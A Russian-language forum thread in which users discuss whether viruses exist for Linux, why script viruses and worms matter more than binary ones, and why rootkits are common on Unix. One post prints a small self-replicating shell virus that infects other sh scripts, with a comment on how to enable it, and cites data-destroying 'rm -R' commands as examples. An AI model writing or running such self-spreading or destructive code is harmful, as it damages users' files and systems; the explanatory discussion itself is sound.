Hans R. Steiner
у кого-нибудь есть вирус для линукс?
AlexzAK
Я тоже хочу вирус!
Вирусы в Linux есть и не только в нем, но, как говорится - их мало. Мое мнение - гораздо опасней не бинарные (к-е будут запускаться только на узком числе машин), а скриптовые. Причины:
-
sh или bash установлен на всех машинах
-
эти оболочки во всех UNIX устроены одинаково
-
в системе есть достаточно консольных программ не только для обычных гадостей, но и для вирусов.
Вот скажите. Вы скачали sh-скрипт, который распаковывает tar-gz архив. При этом вы запускаете его от root’а. А где гарантия, что в нем какой-нибудь вредоносной команды, вроде ‘rm -R /’, которая туда была вставлена умышленно? И в результате запуска оного скрипта вы остаетесь у разбитого корыта. Даже если вы запускаете его не от рута, команда ‘rm -R $HOME/*’ принесет пользователю много вреда - удалит все его файлы и настройки.
Интересующихся могу послать к статье Криса Касперского “Вирусы в UNIX, или Гибель Титаника II” (по-моему есть на www.wasm.ru). Вот пример очень простого sh-вируса:
#!/bin/sh
#Вирус “sh-450”. Удалите эту и строку и “exit”, чтобы вирус мог получить управление.
exit
for F in *
do
#Если в первой строке найдено “#!” и “/sh”, значит $F - sh-скрипт
if [“$(head -c9 “$F” | grep -s -E -H “#!” 2>/dev/null)” != “”]; then #This $F - a Script
if [“$(head -c9 “$F” | grep -s -E -H “/sh” 2>/dev/null)” != “”]; then #$F - a sh-Script
if [“$(tail -n1 “$F” 2>/dev/null)” != “#Virus v.1.1”]; then #$F - not infected
tail -12 $0 >> “$F” 2>/dev/null;
fi
fi
fi
done
#Virus v.1.1
Этот скрипт ищет в текущем каталоге все не зараженные sh-скрипты (в конце к-х нет ‘#Virus v.1.1’) и копирует в их конец последние 12 строчек своего тела. Это очень простой пример. Есть еще полиморфные и закодированные вирусы, и такие, у к-х умышленно усложнен алгоритм чтобы ни пользователи, ни антивирусы не поняли алгоритм его работы.
lcd_swat
Засунул в Mac флэшку, а там в корне два файла висят - autorun.inf и toy.exe.
AccessD
ага, wine’ом
Нет, это - Windows-гадости, к UNIX они не имеют никакого отношения! Бинарных вирусов, скомпилированных для Linux всего-лишь 50-60. Мне неизвестно - сколько скриптовых.
Не стоит думать что если в UNIX нет вирусов - то она безопасна. В этой системе другая раскладка сил. Для размножения вирусов чтобы программа была запущена от root’а. Размножение вирусов практически ограничено потому что никто не будет от root’а запускать офисную или прикладную программу, - в основном запускаются те, к-е были созданы во время установки системы. В Windows 98% юзеров сидят под администратором, поэтому любая запущенная программа может писать в другую программу.
А вот посмотрите на червей. В UNIX их почти столько же, сколько для Windows, несмотря на то, что даже Linux встречается в тысячи раз реже, чем Windows. Черви спокойно существуют в UNIX-системах (хотя бы про червь Морриса все слышали - поражал BSD 4), есть черви Slapper и Scalper. Во-первых играет роль наличие исходников уязвимых программ, во-вторых, заплатки выпускаются реже (посмотрите на FreeBSD - 1/3 дыр еще не закрыта , хотя для некоторых из них уже есть эксплоиты). И в-третьих, сами заплатки устанавливаются реже - их установка и новых версий гораздо проблематичнее:
-
установка программ в UNIX дольше и сложнее, чем в Windows
-
после обновления программы может потребоваться обновление других программ, вплоть до ядра.
В UNIX также более распространены руткиты (скрывающие свое присутствие в системе). В Windows они практически не нужны - ведь все программы в 98% случаев итак запускаются от Администратора.
Итак, под UNIX никогда не будет много бинарных вирусов (а вот скриптовых - может быть больше). А вот новые черви и руткиты будут гораздо более знаменитыми.
Так что… не огорчайтесь - на каждую старуху своя пруха!